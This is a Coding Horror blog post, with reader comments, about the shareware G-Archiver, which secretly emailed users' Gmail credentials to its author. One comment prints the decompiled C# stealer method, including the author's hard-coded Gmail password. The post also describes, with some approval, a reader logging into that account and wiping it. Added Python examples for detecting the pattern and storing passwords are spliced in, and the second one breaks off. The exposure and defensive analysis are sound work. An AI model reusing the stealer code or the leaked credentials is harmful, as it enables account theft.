Coding Horror
programming and human factors
by Jeff Atwood

March 07, 2008

A Question of Programming Ethics

From the ACM Code of Ethics:

As an ACM member I will
  1. Contribute to society and human well-being.
  2. Avoid harm to others.
  3. Be honest and trustworthy.
  4. Be fair and take action not to discriminate.
  5. Honor property rights including copyrights and patent.
  6. Give proper credit for intellectual property.
  7. Respect the privacy of others.
  8. Honor confidentiality.

It's hard to square that with the following hair-raising tale Dustin Brooks sent me via email:

I was looking for a way to back up my gmail account to a local drive. I've accumulated a mass of important information that I would rather not lose. During my search I came across G-Archiver, I figured what the heck I'll give it a try.

It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code. What I came across was quite shocking. John Terry, the apparent creator, hard coded his username and password to his gmail account in source code. All right, not the smartest thing in the world to do, but then I noticed that every time a user adds their account to the program to back up their data, it sends an email with their username and password to his personal email box! Having just entered my own information I became concerned.

I opened up a browser and logged in to gmail using his account information. It still worked.

[Screenshot: gmail password thief]

Upon getting to the inbox I was greeted with 1,777 emails with account information for everyone who had ever used the software and right at the top was mine. I decided to go ahead and blast every email to the deleted folder and then empty it. I may have accidentally changed the password and security question to something I don't remember as well, whoops, my bad. I also contacted google to erase this account as I didn't see a way to delete it myself.

I generally try to give people the benefit of the doubt, but it's difficult to imagine any scenario where this isn't a completely malicious violation of people's trust. This is every user's greatest fear when giving out their login credentials, and to see it realized hurts the trust relationship between users and every other professional programmer working today. I've inadvertently posted my own login information to this very blog before. Fortunately for me, an eagle-eyed reader by the name of Israel Orange didn't abuse that information for his own gain, but instead kindly pointed out my error to me in a private email.

I certainly hope there are more programmers out there like Israel Orange than John Terry. Ethics matter for programmers, too.



Comments

I had a guy email me his Credit Report once in Electronic Form. He frantically emailed me and asked me to delete it, which I did. I called him and he was so happy that he sent me an Amazon.com giftcard for $25. I have had people email me their e-tickets for their flights, etc.

Brian W on March 7, 2008 02:40 PM

That's really bad, and the problem is that only people like us (who know what Reflector is) realize this kind of thing, and very often the law falls short in punishing these kinds of crimes.

Good job Jeff! If you stop programming, try to be a detective or a TV series writer.

I really enjoy your blog, thanks!

Raúl Martínez on March 7, 2008 02:41 PM

Goes to show how much you can trust websites which request your email user/pass to import contacts!

Mithun on March 7, 2008 02:43 PM

You're an honest man, Jeff. Nice work.

Jason L. on March 7, 2008 02:56 PM

Trust is good, possibility to check is better. If anything, this story is the best warning against closed source software.

BTW, why is this software still linked to?

Nikolai on March 7, 2008 03:08 PM

Funny, a lot of people seem to be praising Jeff's honesty. Although I'm sure Jeff is honest, the hero of the story is John Terry, as Jeff himself clearly points out. Not sure where this misunderstanding is coming from.

mwalts on March 7, 2008 03:19 PM

Actually, mwalts, it's Dustin Brooks who is the curious programmer who figured this out. Though I don't know why Jeff doesn't link to the original source.

KyleG on March 7, 2008 03:23 PM

Actually John Terry is the antagonist in this story and Dustin Brooks, the protagonist, deserves all the praise.

Robert Kozak on March 7, 2008 03:23 PM

"Trust but verify."

R. Reagan on March 7, 2008 03:25 PM

KyleG, I agree, I love Jeff's blog but sometimes I wish he would link better to the original source. If in this case it was sent to him privately in an email, he should at least point that out.

Robert Kozak on March 7, 2008 03:25 PM

Surely the *real* hero is Dustin Brooks? John Terry is the villain of the tale.

Confused on March 7, 2008 03:27 PM

Good will, but poor action:

"John Terry" had probably set up email forwarding to a backup gmail account in case somebody decompiled his code.

So he still has all the passwords.

So now, with everything deleted and the account password modified, how are we going to notify all these accounts that they should change their passwords?

Fabien on March 7, 2008 03:30 PM

That's why I don't download programs from those shareware directories.

Check out the site of the g-archiver "author": http://www.matemediainc.com

Looks like a spammy SEO site. Not surprised. There's probably a lot of shareware out there like this, because most of the time the guys pulling scams like this are script kiddies who are trading "recipes" on private forums.

engtech on March 7, 2008 03:30 PM

It's great to see somebody talking about ethics in relation to programming. So often I think it's easy to get caught up in an idea of "I'm just interacting with a machine, and it interacts with other machines, and I'm not responsible for anything...".

It's also unfortunate that there really are people out there who would violate those ethics, but it's good to see that they are real--that's something that does have to be confronted.

I think point 1 in that ACM code is also something to think about. I wonder how many people are working on software that really does not contribute to human well-being, and don't think about it. It's an unfortunate tradition, though--some of the first computers ever were used to aim missiles, and without some twisty logic it's hard to say how that contributes to human well-being more than other things the same programmer could have spent their time doing.

-Max

Max Kanat-Alexander on March 7, 2008 03:31 PM

"Actually, mwalts, it's Dustin Brooks who is the curious programmer who figured this out. Though I don't know why Jeff doesn't link to the original source."

I'm pretty sure this IS the original source. There are no other references to Dustin Brooks / John Terry / G-Archiver that I can find on the web.

Jeff's usually really awesome about linking to sources.

engtech on March 7, 2008 03:33 PM

You stopped FAR too short. This should be turned over to authorities. That must be some sort of CRIMINAL offense.

uhura on March 7, 2008 03:34 PM

Wow. How incredible. I think this is a wake-up call... we shouldn't automatically trust software.

Alan Hogan on March 7, 2008 03:35 PM

You logged into my gmail account? And deleted the fruits of my hard work? Some people have no shame!

(sorry, couldn't resist. -- My name is Thomas, not J Terry)

jterry79 on March 7, 2008 03:41 PM

mwalts: Dustin Brooks is the hero, not John Terry. John Terry is the inept coder.

leetdood on March 7, 2008 03:43 PM

This John Terry seems to email pawel lesnikowski and adityasonphavde (aditya rao) I would not trust these people either.

joe on March 7, 2008 03:51 PM

This sort of problem is what OAuth is designed to help solve.

Not only can 3rd party websites not truly be trusted with one's passwords, now that all computers are pretty much online all the time, it's not safe to trust closed source apps, or even open source apps with uninspected code, with one's password.

Mark Atwood on March 7, 2008 03:54 PM

First of all, Dustin Brooks for president. What a hero.

Next, note that matemedia.com (alleged publisher of this tool) has at least two telephone numbers:
1-877-309-7521
1-877-752-1309
(first via http://www.russmate.com/client_support.php, second via whois)

Dustin Brooks' sense of humor seems to be at least equal to his sense of justice. I want Mr. Brooks to call "John Terry" and explain the situation. In fact, if he recorded the call and placed the MP3 on a lame shareware site I would probably even pay $29.95 to listen.

PWills on March 7, 2008 04:04 PM

That's fishy. Why would jterry need to include his u/p in the program? As a diabolical villain, I don't think he'd make the cut to be on 24. I mean, this isn't like an IRC bot where you have to put the hostname to phone home to into the bot... He could have sent email to his account without exposing the password!

Is he really that dense, or is this some kind of weird hoax?

One thing is true -- if you DL the program and use reflector, you do indeed see the facts as they are described in this post:

using System;
using System.Net;
using System.Net.Mail;
using System.Text;

// Decompiled with Reflector, as posted. The two parameters are the
// user's Gmail username (a) and password (b) entered into G-Archiver.
public static void CheckConnection(string a, string b)
{
    try
    {
        MailMessage message = new MailMessage();
        // Every "connection check" is mailed to the author's own account...
        message.To.Add("JTerry79@gmail.com");
        message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
        message.Subject = "Account";
        message.SubjectEncoding = Encoding.UTF8;
        // ...with the user's credentials in the message body.
        message.Body = "Username: " + a;
        message.Body = message.Body + "\r\nPassword: " + b;
        message.BodyEncoding = Encoding.UTF8;
        message.IsBodyHtml = false;
        message.Priority = MailPriority.High;
        SmtpClient client = new SmtpClient();
        // The author's own Gmail login is hard-coded to authenticate to Gmail's SMTP server.
        client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
        client.Port = 0x24b; // 587, Gmail's STARTTLS submission port
        client.Host = "smtp.gmail.com";
        client.EnableSsl = true;
        client.Send(message);
    }
    catch (Exception)
    {
        // Any failure is swallowed, so the user never sees an error.
    }
}

Patrick on March 7, 2008 04:08 PM
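Automating the review Dustin did by hand, as an added example that is not part of the original post or of Patrick's comment: a Python scanner that reads decompiled C# text (Reflector output) and flags the combination that makes CheckConnection a credential exfiltrator, a hard-coded NetworkCredential literal, a fixed recipient address, and user-supplied username/password parameters concatenated into the mail body. The sample inputs are constructed with placeholder addresses and passwords, not the values from the page.

```python
"""Flag the G-Archiver credential-exfiltration pattern in decompiled C# text.

Added example (not the page's or the project's code). It works on the text
that a decompiler such as Reflector prints, so it is a review aid for code
you have already reflected, not an analysis of the binary itself.
"""
import re
from dataclasses import dataclass
from typing import List

# A C# string literal, with escape sequences such as \r\n allowed inside.
STRING_LIT = r'"((?:[^"\\]|\\.)*)"'

# new NetworkCredential("user", "password") with both arguments as literals.
RE_NETCRED = re.compile(
    r'new\s+NetworkCredential\s*\(\s*' + STRING_LIT + r'\s*,\s*' + STRING_LIT)
# message.To.Add("addr") or message.To.Add(new MailAddress("addr")) with a literal.
RE_TO_ADD = re.compile(
    r'\.To\.Add\s*\(\s*(?:new\s+MailAddress\s*\(\s*)?' + STRING_LIT)
# client.Host = "smtp.example.com"
RE_HOST = re.compile(r'\.Host\s*=\s*' + STRING_LIT)
# message.Body = "Username: " + a;  /  message.Body = message.Body + "\r\nPassword: " + b;
RE_BODY_SECRET = re.compile(
    r'\.Body\s*\+?=\s*(?:\w+\.Body\s*\+\s*)?'
    r'"(?:[^"\\]|\\.)*(?:[Pp]assword|[Uu]sername)(?:[^"\\]|\\.)*"\s*\+\s*(\w+)')
RE_EMAIL = re.compile(r'^[^@\s]+@[^@\s]+\.[^@\s]+$')


@dataclass(frozen=True)
class Finding:
    kind: str
    detail: str
    line: int


def scan_decompiled(source: str) -> List[Finding]:
    """Return one Finding per suspicious line in decompiled C# source text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = RE_NETCRED.search(line)
        if m:
            # Report the account, never echo the literal password into logs.
            findings.append(Finding("hardcoded-credential",
                                    f"user={m.group(1)} (password literal redacted)", lineno))
        m = RE_TO_ADD.search(line)
        if m and RE_EMAIL.match(m.group(1)):
            findings.append(Finding("fixed-recipient", m.group(1), lineno))
        m = RE_HOST.search(line)
        if m:
            findings.append(Finding("smtp-host", m.group(1), lineno))
        m = RE_BODY_SECRET.search(line)
        if m:
            findings.append(Finding("secret-in-body", f"param={m.group(1)}", lineno))
    return findings


def is_exfil_pattern(findings: List[Finding]) -> bool:
    """True when a method both carries user secrets in a mail body and sends
    them to a fixed address using credentials baked into the assembly."""
    kinds = {f.kind for f in findings}
    return {"hardcoded-credential", "fixed-recipient", "secret-in-body"} <= kinds


# Constructed sample mirroring the shape of the decompiled CheckConnection;
# addresses and password are placeholders, not values from any real program.
SAMPLE_EXFIL = r'''
public static void CheckConnection(string a, string b)
{
    MailMessage message = new MailMessage();
    message.To.Add("collector@example.com");
    message.Body = "Username: " + a;
    message.Body = message.Body + "\r\nPassword: " + b;
    SmtpClient client = new SmtpClient();
    client.Credentials = new NetworkCredential("collector@example.com", "PLACEHOLDER-PASSWORD");
    client.Host = "smtp.example.com";
    client.Send(message);
}
'''

# Constructed benign control: recipient and credentials come from the caller
# and a credential store (hypothetical helper names), nothing is hard-coded.
SAMPLE_BENIGN = r'''
public static void SendReport(string recipient, string body)
{
    MailMessage message = new MailMessage();
    message.To.Add(recipient);
    message.Body = body;
    SmtpClient client = new SmtpClient();
    client.Credentials = CredentialStore.Load("smtp");
    client.Host = Settings.SmtpHost;
    client.Send(message);
}
'''

if __name__ == "__main__":
    for name, src in (("exfil", SAMPLE_EXFIL), ("benign", SAMPLE_BENIGN)):
        found = scan_decompiled(src)
        print(f"{name}: exfil pattern = {is_exfil_pattern(found)}")
        for f in found:
            print(f"  line {f.line}: {f.kind}: {f.detail}")
```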

Very interesting Jeff. Btw, here in British Columbia, Canada, Software Engineers can be registered as Professional Engineers that adhere to this code of ethics:
http://www.apeg.bc.ca/resource/publications/actbylawscode.html

Interestingly enough, as a professional software engineer, you can be held legally responsible for the designs and codes you write. I wonder what our profession (vocation? craft?) would look like if we were all held legally responsible for our work?

Mitch Barnett on March 7, 2008 04:09 PM

Patrick wrote :
>That's fishy. Why would jterry need to include his u/p in the program?

Because GMail requires authentication to use their SMTP server.

Matt on March 7, 2008 04:15 PM

Why would anyone pay $30 to get a backup copy of their GMail account when Thunderbird is free? Just connect to GMail's IMAP server, set TB to save all downloaded messages, and do a complete sync. Not only would you then have a complete backup, but you would also be able to read and send email from TB while having it synced with GMail.

Just about any other mail client with IMAP support should also work.

Daniel E. Renfer on March 7, 2008 04:15 PM

Look everyone, I don't mean to be bursting everyone's bubble but I'm not finding this in the source code anywhere. While this is my first time using Reflector, I'm not an idiot and I have searched through all the source code Reflector produces and there is no reference to an email address "jterry79@gmail.com".

Now maybe the software has been updated and the malicious code has been removed, or maybe someone is crying wolf. I would love for someone to reference something specific other than "hey look what I found."

Ryan on March 7, 2008 04:16 PM

> Jeff's usually really awesome about linking to sources.

Thank you, I do try very very hard to link all the sources I talk about. The original is from an email; I added some text to the post to clarify this and put Dustin's name in bold.

And yes, Dustin is the hero here, not me. I'm just reporting it.

Jeff Atwood on March 7, 2008 04:16 PM

Ryan wrote :
>I'm not finding this in the source code anywhere

The CheckConnection method is in the SM.dll Mail class. It is not in the EXE.

Patrick copy / pasted the code accurately.

Matt on March 7, 2008 04:19 PM

My apologies everyone. Looks like I am an idiot.

Ryan on March 7, 2008 04:22 PM

What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I'm just curious as to where you would draw the line.

Travis on March 7, 2008 04:28 PM

This was truly malicious behavior, but (as Jeff has pointed out in previous posts) users do not understand how accessible their identity can be:

I recently recovered a PC from a municipal recycling center. While evaluating its value for parts I discovered it was completely functional. The HDD still had the OS, Outlook, and several years of Turbo Tax on it. Everything was live. I didn't have the nerve to call the guy and tell him how stupid he was, but I was kind enough to bomb the machine to bedrock before reconditioning it. My son now happily surfs PBS on it. Not a bad exchange for a $20 electronics recycling charge and a dead TV.

There are times when I really pity the great unwashed user contingent, and at the same time am grateful that most geeks are non-belligerent.

Rick Cabral on March 7, 2008 04:30 PM

Wow! That's all I can say. I wonder how many gmail accounts he's harvested. Like someone said, maybe this should be reported to the police. Since google accounts can be linked to financial information (via google checkout), this could be considered theft.

Bart on March 7, 2008 04:55 PM

Jeff,

Great detective work.

I don't know if you've ever covered this, but I would think that just asking a user for username and password and email address on a website would probably net someone a certain percentage of people who would for simplicity sake just use the same username and password everywhere (thereby giving you their username and password to email, or who knows what).

Tom Monroe on March 7, 2008 04:57 PM

In response to Travis, some engineers reportedly quit the company that makes the space shuttle's robotic arm, because of a proposed takeover by a U.S. arms maker.

Chris L on March 7, 2008 05:21 PM

>What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I'm just curious as to where you would draw the line.

That's always been the big problem. It's not unique to computer science at all. One could say it started with the physicists "knowing sin" but in reality you can trace it back a lot farther.

But in reality the people taking a paycheck always find a way to justify it to themselves. Oh, they're not the ones harming others -- that's what the military does, what politicians do. Oh, they're not the ones not contributing to society -- they just make the tools. Same old story.

Shmork on March 7, 2008 05:43 PM

My oh my, that is horrible! It goes to show how much seemingly legitimate software we install that could be malicious, and how much trust we place in the authors.

This time round you had the source code, what about apps that we don't?

Ryan Allen on March 7, 2008 06:32 PM

Yeah, it's bad, but come on, use your common sense - there is no such thing as free software. Someone gets something out of it, it might not be money it might be data. Never use shareware - here is the answer.

PaulZ on March 7, 2008 07:06 PM

You don't have to try to justify it. Like it or not, there is evil in the world and people have a moral obligation to protect themselves and their families.

Some of us take that seriously, while others live behind that protection and point fingers about how bad it is.

Oh, and before I worked for a DoD contractor I worked on medical software that was responsible for helping to bring new lives into this world that might not make it.

With either job, I know I am making a difference in the world and sleeping just fine at night. I doubt if I would feel the same working on a new search engine or game or accounting package.

Oogie Pringle on March 7, 2008 07:08 PM

Didn't Dustin email all the affected users to warn them to change their passwords?

Jeremy on March 7, 2008 07:18 PM

I have a problem with 4 in conjunction with 5. Often I find a lot that is unfair in our current copyright law and fairness. (Example: the RIAA has changed its tune and claim it is illegal to rip a CD you purchased for your computer or MP3 player.)

In order to behave in a fair way, I should be allowed to break copyright. But then, I'd be breaking copyright.

gex on March 7, 2008 07:40 PM

I'm no fan of professional soccer, but a quick search or two on some of the (non-victim) names from the screenshot appear to be related to it (John Terry of Chelsea, Pawel, and Lesnikowski). Maybe the dickwad responsible for this douchebaggery (thanks Jeff for expanding my vocabulary) is a fan.

Brian on March 7, 2008 07:44 PM

> Fortunately for me, an eagle-eyed reader by the name of Israel Orange didn't abuse that information for his own gain, but instead kindly pointed out my error to me in a private email.

Is this why you chose the word "orange" for the post security word? Interesting choice. :)

Nice post Jeff.

Patrick on March 7, 2008 08:06 PM

Rule: wherever you give your passwords you should/must be cautious.

Nikos on March 7, 2008 08:08 PM

The ACM also has a similar document called Software Engineering Code of Ethics and Professional Practice which has more practical and tangible aspirations. These aren't just rules for ACM members, they prescribe a code of conduct for all software engineers.

http://www.acm.org/about/se-code#full

Of these, John Terry has violated these:

3.12. Work to develop software and related documents that respect the privacy of those who will be affected by that software.

3.13. Be careful to use only accurate data derived by ethical and lawful means, and use it only in ways properly authorized.

Ken Liu on March 7, 2008 08:32 PM

And that, my friends, truly is coding horror.

John Walker on March 7, 2008 08:37 PM

Hi Jeff,

I don't normally post but I thought I should make an exception for this topic.

I completely agree that this is a horrible betrayal of trust. I find this offensive to the honest programmers out there for whom this has negative effects. It's scumbags like this guy that make people question every file, live in fear of scams, and contribute to fear of technology.

I really enjoy your blog, thanks for sharing this.

Kyle on March 7, 2008 08:38 PM

To give John Terry the benefit of the doubt, there is always the possibility that this was some kind of development (debugging) version that had somehow become publicly available.

A. Nony Mouse on March 7, 2008 08:38 PM

http://www.matemediasoft.com/

These guys are also selling programs for MySpace and YouTube (FriendTools and TubeAdder) that require your login/password.

And here's the kicker: they're both spamming tools.

"Add thousands of new friends to your network quickly. Great tool for those who want to market to myspace users."
"This easy to use software also automates the process of adding comments on YouTube. If you plan on marketing on YouTube, you need this tool."

Kapow on March 7, 2008 09:08 PM

That russmate.com/matemedia.com site rang a bell - I knew I'd seen it somewhere before. Recently. Amid many LOLs.

And yes indeed - MateMedia turned out to be the company hosting a scammy "Federal suppliers directory" site which gave Alex Papadimoulis of The Daily WTF a chance to run a most excellent story all his own:
http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
(Do NOT miss the spectacular flameout by company staff in the comments!)

Man, 2008's really shaping up to be their year, isn't it?

Daniel Rutter on March 7, 2008 09:27 PM

Why have you linked to the original application? I think it can only have bad consequences, like improving their google rank, or lead people who aren't really paying attention over to their site where they may download it.

Aaron on March 7, 2008 09:46 PM

This is really a big threat for opensource or freeware developers. Users won't trust developers anymore who are working hard to provide something useful.

Sahil Saggar on March 7, 2008 10:22 PM

Why didn't Mr. Brooks just use an old-fashioned Perl script for archiving?

Sharma on March 7, 2008 10:25 PM

Terrible!
And Ryan, the info is still there; it is in the Mail class in the SM.dll file, not in the main exe.

trial blazer on March 7, 2008 10:43 PM

I don't normally post, but I wanted to comment on those who are saying that programming in some way for the military violates 1 and 2 of the code above. As Oogie Pringle said, there are people in the world who are malicious, and it is important to defend against them.

Maybe this could be seen as an unfortunate prisoner's dilemma, but in no way does it reflect poorly on the ethical or moral sense of the people doing the programming.

DKH on March 7, 2008 10:54 PM

Please elaborate more on Reflector.

Author/website perhaps? Thanks.

Phil

Phil on March 7, 2008 10:58 PM

@Phil:

Lutz Roeder's .NET Reflector: http://www.aisto.com/roeder/dotnet/

Excellent tool.

We use Lutz as a verb. "Let's lutz it and find out"

David Dawkins on March 7, 2008 11:33 PM

On a related note... let's say I need to send emails through a gmail account from my C# program. This basically means there will be strings inside my source that contain the gmail username and password.

This is obviously bad, in the presence of Reflector. In the unmanaged world we could encrypt the strings using some encryption algorithm, and since the details of the encryption algorithm would be compiled to assembly nobody could tell what's going on. But in the managed world, the details of such an encrypting process are there for everyone to decompile, so it doesn't sound like that's going to work.

This _must_ be a solved problem, but I don't really know the keywords to use to find the solution...

Domenic on March 8, 2008 12:52 AM

Domenic,
you would like to use an encrypted appSettings element in your app.config then.
http://msdn2.microsoft.com/en-us/library/ms998280.aspx

Alexander Groß on March 8, 2008 01:51 AM

Domenic, security by obscurity has never been a solution. You don't embed sensitive credentials in code. Period.

Encrypting the data means you have a key somewhere. Writing your own cryptographic algorithm means it's broken (see Schneier) and anyway, all that's needed to break your clever encrypted-password-in-executable scheme is to set up a software http/https proxy (fiddler, wireshark, etc.) and read the plain text credentials passed by the program.

Never rely on native code obfuscation for security.

Yann Schwartz on March 8, 2008 01:56 AM

HAH! I was *not* expecting my name to pop up when I started reading this post :-) BTW, Jeff sent me some awesome Coding Horror stickers for my trouble.

Patrick-I can't take credit for Jeff's choice of CAPTCHA-it was around a long time before I ever spoke to him.

Israel Orange on March 8, 2008 01:57 AM

Good thing you changed the password to the account. So is John Terry walking scot-free? I believe he has some explaining to do.

gogole on March 8, 2008 04:22 AM

Even after all this, John Terry still has less information about his victims than your average Google employee.

Geri on March 8, 2008 04:59 AM

Why do people act so shocked? If you download any app or go to any website which asks for you credentials to do *anything* you should be extremely cautious and only trust once you've verified that it is legit. You might argue that there was no way to verify it in this case without reflecting it and looking at what it was doing, but your credentials are basically your children when you're roaming the 'net - so if you can't verify it, DON'T USE IT. It's pretty simple. And for the person who said this guy was probably smart enough to create a back-up account "in case someone reflected his code"... no, he would have obfuscated the code if he was being cautious. He f'ed up.

I assume most of you would trust, say, Facebook to keep its word and *not* store your credentials when you allow it to use its "Friend Finder"? Why?

And it's frankly a waste of time to say this is a matter of ethics and we all need to be held to a higher standard and "if only he adhered to the code" etc. Sorry, the 'net is the real world, it's not contained within our individual computers. People are out to scam, and you need to go out there believing it. As honest programmers we need to stick together, and the scammers will make themselves known. That's the real value of Jeff's post.

SpongeJim on March 8, 2008 05:20 AM

Actually, Raúl, U.S. law is very specific as to this particular issue. Have a look at the Federal Wiretap Act, 18 U.S.C. 2510 (http://www.cybercrime.gov/wiretap2510_2522.htm)

Joshua Auriemma on March 8, 2008 07:21 AM

So, just to be a little contrarian, can anyone point out in the code of ethics where it says that programmers should become vigilantes? It would seem to me that Dustin Brooks falls short of living up to the ideal of honoring property rights. By deleting the GMail account and the emails therein Dustin has potentially opened himself up to potential prosecution under laws designed to be used against hackers. In addition he has potentially destroyed evidence that might be used to prosecute John Terry.

If he really wanted to be a good guy he could have just reported the individual to Google's security hotline along with the appropriate documentation, as well as reporting to the shareware site where the application was hosted.

Joe Brinkman on March 8, 2008 07:28 AM

You did download it directly from the developer's site? Or purchase it?

There is the possibility that you downloaded a hacked version. Although it seems unlikely the gmail account would be similar to the developer's name... a less lame scammer would send to a mail server that wouldn't provide access using same password or be traceable back to him.

If you purchased it and/or didn't accept a use at your own risk license it's hard to imagine a crime or civil liability doesn't exist.

curmudgeonly troll on March 8, 2008 07:39 AM

@Joe:

If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did. Stopping the leak should be first priority, then catching the guy. The chances of the latter, and successfully prosecuting him/her, are unfortunately slim anyway.

A. L. Flanagan on March 8, 2008 07:46 AM

One point about trusting "free" software: there's a big difference between this sort of program and open source projects, where you (and everyone) can see the actual source code. This couldn't have happened if someone knowledgeable had been able to even glance at the source.

A. L. Flanagan on March 8, 2008 07:48 AM

I was going to respond telling John Terry how he could have avoided this situation, but I decided to apply the Code of Ethics and not do so. Hopefully I made the world a better place today.

modern women suck on March 8, 2008 08:05 AM

@Oogie Pringle
That's the problem with this world, people like you. You are all about self preservation and the preservation of those close to you. The fact is that if we considered those around us who we don't know as equal in worth to ourselves we would think twice before working on weapons and devices that we know will kill others. Just because you justify it by saying that there are evil people in the world, does not absolve you from the fact that you are a contributing factor to that person's death. More innocent people die today as a result of the direct work that we do. This is no longer the days of open war when enemies met in a field and attacked each other and you knew that pretty much anybody who was there had decided to give their life for that cause. Now we have more innocent people dying than combatants. So you have to ask yourself when you write that code for the guidance chip that goes in the missile, but for the fact that I and my colleagues chose to write this code would xxxxx be dead? I know you sleep well at night because you think you are protecting your family and that is the truly tragic part about this. I know some will make the argument that anything can be a weapon, you don't know how it is going to be used, well can you honestly say that?

stewie on March 8, 2008 08:13 AM

I wouldn't worry too much about notifying the people about their username/password compromise. As you can clearly see, the emails have never been read. Only Google could read them without marking them as read, and that's kind of irrelevant, now isn't it?

Joshua on March 8, 2008 08:14 AM

Stewie and the rest of you anti-defense morons need to take your liberal, kumbaya attitudes and shove them up your a$$e$. In a perfect world we could all rest easy knowing that no one would ever create weapons because they would all abide by some unwritten code of ethics. But the world is not perfect and someone somewhere is going to do the coding. And because of that, we need someone to do the coding on defense systems as well. That's why it's called "defense" and not "offense".

War sucks. And yes, innocent people get hurt. But innocent people get hurt by more than just war. If you stopped programming on everything that could possibly hurt an innocent person then you wouldn't be programming at all.

Matt on March 8, 2008 08:45 AM

"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did."

Thereby destroying the evidence, and stopping any chance you had of successfully...

a) suing for damages, or

b) proving that the criminal acts done in your name with your gmail account weren't actually perpetrated by you.

Much better would have been to change the password on the account (locking the real John Terry out), then report it to Google.

But hindsight is always 20-20, especially when you can be a vigilante hero.

Geri on March 8, 2008 08:45 AM

@Joshua
There is a "mark as unread" button in GMail.

Andrei on March 8, 2008 08:46 AM

Isn't it really about ethics, period, and not just "programming ethics"?

However, it seems a little silly to focus on this incident -- every time we post, the internet remembers; every time we log on, we allow (without the legal action others have mentioned) large corporations to write information to our hard drives without permission, and to "phone home", without our permission.

Steve on March 8, 2008 08:48 AM

@paulz:
"""
Yeah, it's bad, but come on, use your common sense - there is no such thing as free software. Someone gets something out of it, it might not be money it might be data. Never use shareware - here is the answer.
"""

Yes, there is such a thing as free software - free (as in free speech) open source software. The problem is not free (as in free beer) vs commercial, but closed source vs open source. And yes, there are actually programmers that give their work away without trying to steal anything from you.

Bruno on March 8, 2008 08:59 AM

MateMedia is a legitimate company and we are absolutely horrified that this has occurred.

We have removed from our websites all links to the software, and will be requesting any download sites that are hosting the software to remove it immediately.

We are in the process of notifying our customers, and we're investigating this matter with our software development team.

Russ on March 8, 2008 09:16 AM

I think the issue here is not ethics, we're talking about unlawful behavior, that guy should be prosecuted.

Regards

Jorge Diaz Tambley on March 8, 2008 09:22 AM

What everyone seems to be missing is the fact that through Gmail you can easily set up a filter to forward all incoming e-mail to another e-mail address without marking it read. So deleting all of the e-mails probably did absolutely nothing. Plus the fact that this guy could be using his own program to archive all of the e-mails he got with the usernames/passwords.

I think that Dustin Brooks's heart was in the right place, but the best thing would have been to immediately change the password, and then go into "contacts" and click "select all" and send a warning e-mail to everyone (Gmail automatically adds a contact for anyone that e-mails you). Then to notify Google, leaving the e-mails intact as evidence (since you already changed the password, the guy can no longer get into the account, so the e-mails don't need to be deleted).

Despite that, I think that Dustin did a great thing, and I'm glad he also made an effort to get the word out by sending the story to a well known blog like this one.

I made the mistake of telling Facebook's Friend Finder my password, and then realized how dumb it was and changed it to a pass-phrase that I will never share with anyone/anything except the gmail sign in page. I think Jeff has done a great job in championing proper password practices.

As a programmer, I'm ashamed to say that I never really thought about how I was storing my users' passwords until after reading a few posts on this blog. However my boss unfortunately will not allow me to encrypt users' passwords because he says that "we don't store any private data, and we want password recovery to be instant and easy". So we use pathetic secret questions/answers to "verify" them and then reveal to them their password in plain text right there on the webpage if they forgot it. It makes me sick. Unfortunately, I don't have a choice...

I am interested to hear any further details on what happens with this story if Google ever tells Dustin if anything ever came of this...

Chris on March 8, 2008 09:32 AM
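The storage choice Chris describes above, set beside the alternative he was arguing for, as an added example written for this page (not code from the post or any commenter; the `PlaintextStore`/`HashedStore` names, the in-memory tables and the iteration count are this example's own choices):

```python
"""Added example, not code from the post or its commenters.

Constructed demo of two user stores. PlaintextStore is the "keep it as typed so
the forgot-password page can echo it back" design from the comment above;
HashedStore is what a practitioner would push for instead: salted PBKDF2 plus a
single-use, time-limited reset token, so recovery never needs the original
password and there is nothing to reveal, even to the site itself.
"""
import hashlib
import hmac
import os
import secrets
import time

PBKDF2_ITERATIONS = 600_000  # example's own choice; tune to your hardware's cost budget
RESET_TOKEN_TTL = 15 * 60    # seconds a reset token stays valid


class PlaintextStore:
    """Password kept as typed. Anyone who reads the table (a backup, SQL
    injection, a rogue admin, a leak like the one in this post) gets every
    password, including the ones users reuse elsewhere."""

    def __init__(self):
        self.users = {}

    def register(self, username, password):
        self.users[username] = password

    def recover(self, username):
        return self.users[username]  # the "instant and easy" recovery the boss wanted


class HashedStore:
    """Salted hash storage plus token-based reset."""

    def __init__(self):
        self.users = {}         # username -> (salt, pbkdf2 digest)
        self.reset_tokens = {}  # sha256(token) -> (username, expiry)

    @staticmethod
    def _derive(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)

    def register(self, username, password):
        salt = os.urandom(16)  # per-user salt: identical passwords get different digests
        self.users[username] = (salt, self._derive(password, salt))

    def verify(self, username, password):
        record = self.users.get(username)
        if record is None:
            self._derive(password, b"\x00" * 16)  # burn the same work so timing does not reveal absent users
            return False
        salt, stored = record
        return hmac.compare_digest(stored, self._derive(password, salt))

    def begin_reset(self, username, now=None):
        """Issue a single-use, time-limited token. Only its hash is stored, so a
        leaked table does not contain usable reset tokens."""
        if username not in self.users:
            return None
        token = secrets.token_urlsafe(32)
        expiry = (now if now is not None else time.time()) + RESET_TOKEN_TTL
        self.reset_tokens[hashlib.sha256(token.encode()).digest()] = (username, expiry)
        return token

    def complete_reset(self, token, new_password, now=None):
        entry = self.reset_tokens.pop(hashlib.sha256(token.encode()).digest(), None)  # pop: single use
        if entry is None:
            return False
        username, expiry = entry
        if (now if now is not None else time.time()) > expiry:
            return False
        self.register(username, new_password)
        return True


def demo():
    """Run both designs through the same scenario and return the outcomes."""
    weak = PlaintextStore()
    weak.register("alice", "correct horse")

    strong = HashedStore()
    strong.register("alice", "correct horse")
    token = strong.begin_reset("alice", now=1000)
    return {
        "plaintext_leak": weak.recover("alice"),          # the whole password, verbatim
        "login_ok": strong.verify("alice", "correct horse"),
        "login_bad": strong.verify("alice", "correct horsf"),
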